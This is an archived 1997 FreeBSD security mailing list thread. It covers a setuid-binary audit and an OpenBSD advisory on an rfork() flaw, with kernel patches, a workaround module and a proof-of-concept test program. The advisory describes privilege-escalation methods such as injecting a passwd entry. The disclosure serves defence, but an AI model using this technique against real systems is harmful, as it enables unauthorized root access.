in-depth other changes, will result in very major problems, even if you aren't connected to the Internet. COMMENTS: *** It's sendmail. smapd, smrsh, other programs to help reduce risk? alternatives? don't run sendmail as daemon if you don't need to recieve mail. *** recent bug fixes 76850 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:22 ./usr/libexec/mail.local USE: Part of sendmail; used for local mail delivery. IMPACT: Removing the setuid flag from mail.local, without numerous other changes, will result in major problems on your system. COMMENTS: *** related to sendmail, setgid possibilities 65 40 -rwsr-xr-x 1 root bin 20480 Jul 16 20:33 ./usr/sbin/mrinfo 67 56 -rwsr-xr-x 1 root bin 28672 Jul 16 20:33 ./usr/sbin/mtrace USE: Used to debug multicast routing. IMPACT: Removing the setuid flag from mrinfo and mtrace will mean that users other than root will be unable to use these utilities to get information about multicast routing. If you aren't using multicast routing, they can be disabled without problem. COMMENTS: If you don't know what multicast routing is, you almost certainly aren't using it. 91 168 -r-sr-xr-x 1 root bin 86016 Jul 16 20:34 ./usr/sbin/ppp USE: Establish ppp connections using kernel level ppp. IMPACT: Removing the setuid flag results in users other than root being unable to run kernel level ppp. COMMENTS: If you are using user level ppp (see "/usr/sbin/ppp"), disabling kernel level ppp ("pppd") will have no impact on your ppp connections. On many systems that do use pppd, there is no need to have it executable by everyone so restricting execution to a specific group may be appropriate. 92 128 -r-sr-xr-x 1 root bin 65536 Jul 16 20:34 ./usr/sbin/pppd USE: Establishing ppp connections using user level ppp. IMPACT: Removing the setuid flag results in users other than root being unable to run kernel level ppp. COMMENTS: If you are using kernel level ppp (see "/usr/sbin/pppd"), disabling user level ppp will have no impact on your ppp connections. On many systems that do user user level ppp, there is no need to have it executable by everyone so restricting execution to a specific group may be appropriate. Personally, I have some serious (perhaps unfair; I have NOT really looked into to code in depth) concerns about the thought given by the author to security while writing "ppp". These concerns include things such as the suggested login script in the man page (although that may or may not have been suggested by the original author; see PR 1383 for details) and the default of allowing telnet connections to manage the ppp session. *** info on recent bug and fix 108 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:34 ./usr/sbin/sliplogin USE: Establishing a SLIP connection. IMPACT: Removing the setuid flag results in users other than root being unable to properly establish a SLIP connection. COMMENTS: If you don't use slip, take the setuid flag off. There was a security hole in old versions that was fixed as of 1996/04/24; 2.1.0 is vulnerable, 2.1.5 should be fixed. 118 40 -r-sr-xr-x 1 root bin 20480 Jul 16 20:34 ./usr/sbin/timedc USE: Used to control the time daemon timed. IMPACT: Removing the setuid flag results in users other than root being unable to use timedc. timedc is setuid because it needs to bind to a privleged port. If you don't use timedc, timed should work just fine with the setuid flag removed from timed. COMMENTS: This code seems relatively secure since it gets rid of its root privileges right after it binds to the port. 119 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:34 ./usr/sbin/traceroute USE: Used to trace the route that IP packets follow over a network. Extremely useful for users in many environments. IMPACT: Removing the setuid flag results in users other than root being unable to us traceroute. COMMENTS: There have been some recent security fixes in traceroute, but I am uncertain as to if they fix exploitable holes. *** 207 352 -r-sr-xr-x 1 root bin 172032 Jul 16 20:15 ./bin/rcp USE: Used to copy files across the network. IMPACT: Removing the setuid flag results in users other than root being unable to use rcp. COMMENTS: rcp uses host based security and is vulnerable to things such as IP spoofing. A bad thing to use, not just because of any possible security problems in the binary. ssh is a more secure solution that is worth investigating. 686 384 -r-sr-sr-x 2 root tty 188416 Jul 16 20:23 ./sbin/dump 686 384 -r-sr-sr-x 2 root tty 188416 Jul 16 20:23 ./sbin/rdump dump and rdump are links to the same file. USE: Used for local and network backups. IMPACT: Removing the setuid flag results in users other than root being unable to perform backups of the filesystem. COMMENTS: The idea is that anyone in the 'operator' group is able to do backups without having to be root. This is an ideal candidate for restricting execution by means of group, except for the fact that it has to be setgid tty to allow the 'n' option to work. If you don't use the 'n' option, remove the setgid flag, change it to group operator, and remove the world execute flag. Then only those in the operator group can exploit any security holes that may be there, and since generally they can read from the raw disk device anyway... If it is not setuid root, then local backups can still work as long as the person doing them has access to the raw device file and the dump device, however network backups will not work because rcmd(3) will fail. 717 256 -r-sr-xr-x 1 root bin 118784 Jul 16 20:24 ./sbin/ping USE: ping is used to send icmp echo requests to hosts on the network for the purpose of determining reachability. IMPACT: removing the setuid flag results in users other than root being unable to use ping. COMMENTS: ping is a very useful thing for users, although there are possible denial of service attacks possible, especially with the '-l' option. There have been some potential security holes fixed after 2.1.5 was released, but it appears like none of them are exploitable. Perhaps. 721 416 -r-sr-sr-x 2 root tty 204800 Jul 16 20:24 ./sbin/restore 721 416 -r-sr-sr-x 2 root tty 204800 Jul 16 20:24 ./sbin/rrestore restore and rrestore are links to the same file. USE: Used for local and network restores. IMPACT: same as dump COMMENTS: same as dump 722 272 -r-sr-xr-x 1 root bin 126976 Jul 16 20:24 ./sbin/route USE: route is used to maintain the routing table. IMPACT: removing the setuid flag results in users other than root being unable to access the routing table via route. Normally users can't change routes anyway, so the only thing you loose is 'route get' and 'route monitor'. COMMENTS: minimal impact in most situations if the setuid flag is removed. 726 288 -r-sr-x--- 1 root operator 139264 Jul 16 20:24 ./sbin/shutdown USE: Used to shutdown the system. IMPACT: removing the setuid flag results in users other than root being unable to use shutdown. COMMENTS: it is restricted to execution by those in the operator group anyway, so as long as you are careful about who you put in the operator group there should be little risk. 734 288 -r-sr-xr-x 1 root bin 139264 Jul 16 20:24 ./sbin/mount_msdos USE: Used to mount MS-DOS filesystems. IMPACT: removing the setuid flag results in users other than root being unable to mount DOS filesystems. COMMENTS: I sure don't want users mounting filesystems on my box. While it is true that in some situations it can be useful to allow users to do so, I much prefer mtools if users need access to DOS filesystems. I find it more an issue of stability than security, since I don't trust the FreeBSD DOS filesystem code. From owner-freebsd-security Sat Aug 2 13:47:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA13192 for security-outgoing; Sat, 2 Aug 1997 13:47:47 -0700 (PDT) Received: from firewall.ftf.dk (root@[129.142.64.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA13186 for ; Sat, 2 Aug 1997 13:47:43 -0700 (PDT) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id XAA10054 for ; Sat, 2 Aug 1997 23:12:47 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id WAA07277 for ; Sat, 2 Aug 1997 22:48:00 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.5/8.8.5/prosa-1.1) id WAA18907; Sat, 2 Aug 1997 22:46:54 +0200 (CEST) Message-ID: <19970802224654.14290@deepo.prosa.dk> Date: Sat, 2 Aug 1997 22:46:54 +0200 From: Philippe Regnauld To: freebsd-security@freebsd.org Subject: Re: security hole in FreeBSD References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Description: Main Body X-Mailer: Mutt 0.69 In-Reply-To: ; from Andrew on Sat, Aug 02, 1997 at 03:00:34PM +1000 X-Operating-System: FreeBSD 2.2.1-RELEASE i386 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Andrew writes: > So write one :-) > I'm sure that if you wrote the things you do and submitted it for comment > you could end up with a relatively complete document. Probably wouldn't be > a substitute for reading a few of the recommended books but it might be > somewhere to start. This has to be connected with the freebsd-doc people. Since my security hardware is all freebsd, and I seriously need to formalize and document it, I'll try to write a draft of guidelines starting next week and post it in both places. -- -- Phil -[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]- -[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]- From owner-freebsd-security Sat Aug 2 18:02:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA25744 for security-outgoing; Sat, 2 Aug 1997 18:02:49 -0700 (PDT) Received: from enteract.com (enteract.com [206.54.252.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA25730 for ; Sat, 2 Aug 1997 18:02:40 -0700 (PDT) Received: (from tqbf@localhost) by enteract.com (8.8.5/8.7.6) id UAA20008; Sat, 2 Aug 1997 20:02:33 -0500 (CDT) From: "Thomas H. Ptacek" Message-Id: <199708030102.UAA20008@enteract.com> Subject: Vulnerability in 4.4BSD rfork() implementation To: tech@openbsd.org, freebsd-security@freebsd.org Date: Sat, 2 Aug 1997 20:02:32 -0500 (CDT) Reply-To: tqbf@enteract.com X-Mailer: ELM [version 2.4 PL24 ME8a] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk ---------------------------------------------------------------------------- OpenBSD Security Advisory August 2, 1997 Vulnerability in rfork() System Call ---------------------------------------------------------------------------- SYNOPSIS A vulnerability in certain 4.4BSD kernels allows processes to gain access to restricted resources by manipulating the file descriptor tables of SUID and SGID executables. Applications of this vulnerability will allow users to gain root access. ---------------------------------------------------------------------------- AFFECTED SYSTEMS It is believed that all 4.4BSD operating systems implementing the rfork() system call are currently vulnerable to this problem. These operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD project has resolved this problem in OpenBSD-current. The rfork() system call originated in the Plan9 operating system, and the 4.4BSD implementations of it share the original's semantics. Therefore, it is believed that Plan9 may be vulnerable as well. Code is provided at the end of this document that will allow system operators to test their vulnerability. ---------------------------------------------------------------------------- DETAILS Recent 4.4BSD operating systems added the rfork() system call as an additional method of creating a new process. Unlike fork(), rfork() allows the caller tighter control over which resources are shared between the parent and child processes. These resources include the per-process descriptor table. The descriptor table of a process lists all open file descriptors for that process. Input and output on files, sockets, and pipes is done through these descriptors. Two processes sharing the same descriptor table can read from any file either has open in read mode, and write to any file either has in write mode. Unfortunately, the 4.4BSD implementation of rfork() allows this to occur with processes whose credentials have been altered via SUID/SGID programs. A process can execute any SUID program on the system and gain access to it's file descriptor table. This can be exploited to allow unprivileged processes to access security-critical resources, such as the password file. ---------------------------------------------------------------------------- TECHNICAL INFORMATION The default behavior of rfork() is to share the file descriptor table between the child and parent processes. A process created with rfork() can therefore, by default, be manipulated by it's parent. An example of this problem occurs in passwd(1), an SUID program that modifies the password database. A user on the system can rfork() a process and use it to execute passwd(1). The child process will gain effective superuser credentials as a result of executing the SUID program. The parent can then wait for the temporary copy of the password database to be opened, and inject a fake entry into it using the file descriptor it now shares with passwd(1). When the password database is rebuilt, the fake entry will be commited to it and system security will be compromised. It should be noted that this is not the only avenue of exploitation for this problem. The vulnerability allows complete control over the file descriptor tables of privileged programs; this can be exploited in a variety of ways with any SUID program. Another possible attack allows an attacker to, among other things, steal sockets from network programs; an attacker can execute an SUID networking program such as "ping", duplicate the descriptor associated with a raw socket, and close the original descriptor. The unprivileged attacker now controls a raw socket. Additionally, an attacker can close a descriptor opened by an SUID program, and re-open it pointing elsewhere, causing the SUID program to unwittingly alter any file accessible by the attacker. ---------------------------------------------------------------------------- RESOLUTION Provided at the end of this document is a patch from OpenBSD-current that resolves the problem in OpenBSD systems. The OpenBSD patch alters execve() to cause it not to honor the SUID or SGID bit when executing from a process that shares a file descriptor table with a different process. Also provided is a modloadable workaround for FreeBSD. The provided module will disable the rfork() system call from a running system that supports loadable modules. ---------------------------------------------------------------------------- OPENBSD PATCH The following patch resolves the rfork() problem in OpenBSD systems. -- cut here -- --- kern_exec.c 1997/06/05 08:05:54 1.11 +++ kern_exec.c 1997/08/01 22:54:50 1.12 @@ -1,4 +1,4 @@ -/* $OpenBSD: kern_exec.c,v 1.11 1997/06/05 08:05:54 deraadt Exp $ */ +/* $OpenBSD: kern_exec.c,v 1.12 1997/08/01 22:54:50 deraadt Exp $ */ /* $NetBSD: kern_exec.c,v 1.75 1996/02/09 18:59:28 christos Exp $ */ /*- @@ -124,7 +124,8 @@ error = EACCES; goto bad1; } - if ((vp->v_mount->mnt_flag & MNT_NOSUID) || (p->p_flag & P_TRACED)) + if ((vp->v_mount->mnt_flag & MNT_NOSUID) || + (p->p_flag & P_TRACED) || p->p_fd->fd_refcnt > 1) epp->ep_vap->va_mode &= ~(VSUID | VSGID); /* check access. for root we have to see if any exec bit on */ -- cut here -- ---------------------------------------------------------------------------- FREEBSD PATCH The following patch is unsupported by the FreeBSD project. -- cut here -- --- kern_exec.c Wed Apr 23 17:13:00 1997 +++ kern_exec_new.c Sat Aug 2 19:18:34 1997 @@ -653,7 +653,9 @@ * Disable setuid/setgid if the filesystem prohibits it or if * the process is being traced. */ - if ((vp->v_mount->mnt_flag & MNT_NOSUID) || (p->p_flag & P_TRACED)) + if ((vp->v_mount->mnt_flag & MNT_NOSUID) + || (p->p_flag & P_TRACED) + || p->p_fd->fd_refcnt > 1) attr->va_mode &= ~(VSUID | VSGID); return (0); -- cut here -- ---------------------------------------------------------------------------- FREEBSD WORKAROUND The following module, when loaded on a FreeBSD system supporting rfork(), will disable the system call as a temporary resolution to the problem. -- cut here -- # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # Makefile # unrfork_mod_load.c # echo x - Makefile sed 's/^X//' >Makefile << 'END-of-Makefile' XBINDIR= . XSRCS= unrfork_mod_load.c XKMOD= disable_rfork XNOMAN= none X XCLEANFILES+= ${KMOD} X X.include END-of-Makefile echo x - unrfork_mod_load.c sed 's/^X//' >unrfork_mod_load.c << 'END-of-unrfork_mod_load.c' X#define RFORK_SYSCALL_NO 251 X X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X#include X Xint disable_rfork(struct lkm_table *lkp, int cmd, int ver); X XMOD_MISC(disable_rfork); X Xstatic int Xdisable_rfork_load(struct lkm_table *lkp, int cmd) { X struct sysent *sp = &sysent[RFORK_SYSCALL_NO]; X int err = 0; X X switch(cmd) { X case LKM_E_LOAD: X sp->sy_call = (sy_call_t *) nosys; X X printf("rfork() call disabled\n"); X break; X X case LKM_E_UNLOAD: X sp->sy_call = (sy_call_t *) rfork; X X printf("rfork() call enabled\n"); X break; X X default: X err = EINVAL; X break; X } X X return(err); X} X Xint disable_rfork(struct lkm_table *lkp, int cmd, int ver) { X DISPATCH(lkp, cmd, ver, disable_rfork_load, X disable_rfork_load, lkm_nullcmd); X} END-of-unrfork_mod_load.c exit ---------------------------------------------------------------------------- EXAMPLE CODE The following code tests for the presence of the rfork() vulnerability on 4.4BSD systems. If, after running this program, a file is created in "/" containing the word "VULNERABLE", the system is vulnerable to the problem. To use this test, extract the following two C programs. Compile the first ("dummy-suid") and make it SUID root, world executable. Compile and run the second in the same directory. -- cut here (dummy-suid.c) -- #include #include #include int main() { int fd; umask(2); /* open a file in the root directory */ if(fd = open("/VULNERABLE", O_RDWR|O_CREAT) < 0) { perror("open"); exit(0); } /* wait for something to happen */ for(;;); exit(0); } -- cut here (test.c) -- #include #include int main() { int p; /* UNPRIVILEGED */ /* create a new process that shares it's parent's file * descriptor table */ if(!(p = rfork(RFPROC))) { /* wait for parent to open a file, write * to it. */ sleep(1); write(3, "VULNERABLE\n", 10); exit(0); } /* PRIVILEGED */ /* execute 'p', an SUID program that opens a file and * hangs */ execl("./dummy-suid", "dummy-suid", NULL); exit(0); } -- cut here -- ---------------------------------------------------------------------------- CREDITS The OpenBSD development team would like to express gratitude to Danny Dulai for his discovery of this problem, to Theo de Raadt for the OpenBSD patch, and to Tim Newsham, for providing proof-of-concept code. The developers at OpenBSD would also like to thank Perry Metzger for his reliable and consistant support of their work. OpenBSD would like to thank Crosswalk Network Security, Inc. for extensive assistance in the discovery, testing, and documentation of this vulnerability. --- Crosswalk Network Security, Inc. is a full service computer security consultancy, founded to address the growing need for comprehensive data protection solutions. By providing extensive security auditing, intrusion detection and response, rigid policy design, and implementation of cutting-edge encryption systems, Crosswalk ensures robust, thorough, and uncompromising protection for organizations seeking enterprise wide data security. For more information, mail info@crosswalk.com. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzPjeZkAAAEEAL4FxOmLn0b4xbgO4VOs0q/puHP2PQQe8u+H9HBKVzdcJpNi Rux9m9YcrVheJiI14LXsXyQjRc2gPUg2449KVJmlaftY99XsqWMv14SnXdVuwbLd M2PyVf9dQe0fhqhRTCchXG9rGtYUPowSofBpNHmkQ8Vy0UqGAmB3uXRU3efNAAUR tDlDcm9zc3dhbGsgTmV0d29yayBTZWN1cml0eSwgSW5jLiA8c2VjdXJpdHlAY3Jv c3N3YWxrLmNvbT4= =TIRq -----END PGP PUBLIC KEY BLOCK----- From owner-freebsd-security Sat Aug 2 20:52:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA02429 for security-outgoing; Sat, 2 Aug 1997 20:52:00 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA02418 for ; Sat, 2 Aug 1997 20:51:56 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id VAA11192 for freebsd-security@FreeBSD.ORG; Sat, 2 Aug 1997 21:51:55 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id VAA15642 for ; Sat, 2 Aug 1997 21:53:52 -0600 (MDT) Date: Sat, 2 Aug 1997 21:53:52 -0600 (MDT) From: Marc Slemko To: freebsd-security@FreeBSD.ORG Subject: Re: Vulnerability in 4.4BSD rfork() implementation In-Reply-To: <199708030102.UAA20008@enteract.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sat, 2 Aug 1997, Thomas H. Ptacek wrote: > ---------------------------------------------------------------------------- > > OpenBSD Security Advisory > > August 2, 1997 > > Vulnerability in rfork() System Call > > ---------------------------------------------------------------------------- > > SYNOPSIS > > A vulnerability in certain 4.4BSD kernels allows processes to gain > access to restricted resources by manipulating the file descriptor > tables of SUID and SGID executables. Applications of this vulnerability > will allow users to gain root access. > > ---------------------------------------------------------------------------- > > AFFECTED SYSTEMS > > It is believed that all 4.4BSD operating systems implementing the > rfork() system call are currently vulnerable to this problem. These > operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD > project has resolved this problem in OpenBSD-current. Since this wasn't entirely clear on some of the FreeBSD aspects, a few comments... First, this is a real hole. Earlier today it took me only a few minutes to make a program to add another uid 0 to your passwd file to give you root access. With the skeleton code posted in this advisory, it is even easier. Secondly, FreeBSD 2.2 (probably any version of 2.2-current starting around 1996/02/23) and 3.0 are both vulnerable. 2.1 and earlier are not. Third, I would recommend the use of the loadable module included in the advisory to close the hole temporarily until there is a FreeBSD advisory or patch. While the supplied patch for kern_exec looks fine, using the module is easier and saves you having to do things twice when an official patch comes out. Few things (very few...) use rfork() so it shouldn't hurt much. To use the loadable module, unarchive the shell archive included in the origial post, type "make", then do something like: modload -e disable_rfork disable_rfork.o as root. You should get a kernel message that the rfork() call is disabled. You should probably make it load at boot to prevent someone from deliberately crashing the system to remove the protection. From owner-freebsd-security Sat Aug 2 22:07:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA04869 for security-outgoing; Sat, 2 Aug 1997 22:07:10 -0700 (PDT) Received: from limbo.senate.org (nathan@senate.org [204.141.125.38]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA04864 for ; Sat, 2 Aug 1997 22:07:06 -0700 (PDT) Received: (from nathan@localhost) by limbo.senate.org (8.8.6/8.8.6) id BAA15769; Sun, 3 Aug 1997 01:07:27 -0400 (EDT) From: Nathan Dorfman Message-Id: <199708030507.BAA15769@limbo.senate.org> Subject: Re: Vulnerability in 4.4BSD rfork() implementation In-Reply-To: from Marc Slemko at "Aug 2, 97 09:53:52 pm" To: marcs@znep.com (Marc Slemko) Date: Sun, 3 Aug 1997 01:07:27 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > On Sat, 2 Aug 1997, Thomas H. Ptacek wrote: > > > ---------------------------------------------------------------------------- > > > > OpenBSD Security Advisory > > > > August 2, 1997 > > > > Vulnerability in rfork() System Call > > > > ---------------------------------------------------------------------------- > > > > SYNOPSIS > > > > A vulnerability in certain 4.4BSD kernels allows processes to gain > > access to restricted resources by manipulating the file descriptor > > tables of SUID and SGID executables. Applications of this vulnerability > > will allow users to gain root access. > > > > ---------------------------------------------------------------------------- > > > > AFFECTED SYSTEMS > > > > It is believed that all 4.4BSD operating systems implementing the > > rfork() system call are currently vulnerable to this problem. These > > operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD > > project has resolved this problem in OpenBSD-current. > > Since this wasn't entirely clear on some of the FreeBSD aspects, a few > comments... > > First, this is a real hole. Earlier today it took me only a few minutes > to make a program to add another uid 0 to your passwd file to give you > root access. With the skeleton code posted in this advisory, it is even > easier. > > Secondly, FreeBSD 2.2 (probably any version of 2.2-current starting > around 1996/02/23) and 3.0 are both vulnerable. 2.1 and earlier are not. I compiled and ran the two tests below on a 3.0-CURRENT system (cvsuped and compiled Tue Jul 29 21:37:02 EDT 1997. It failed to create a /VULNERABLE.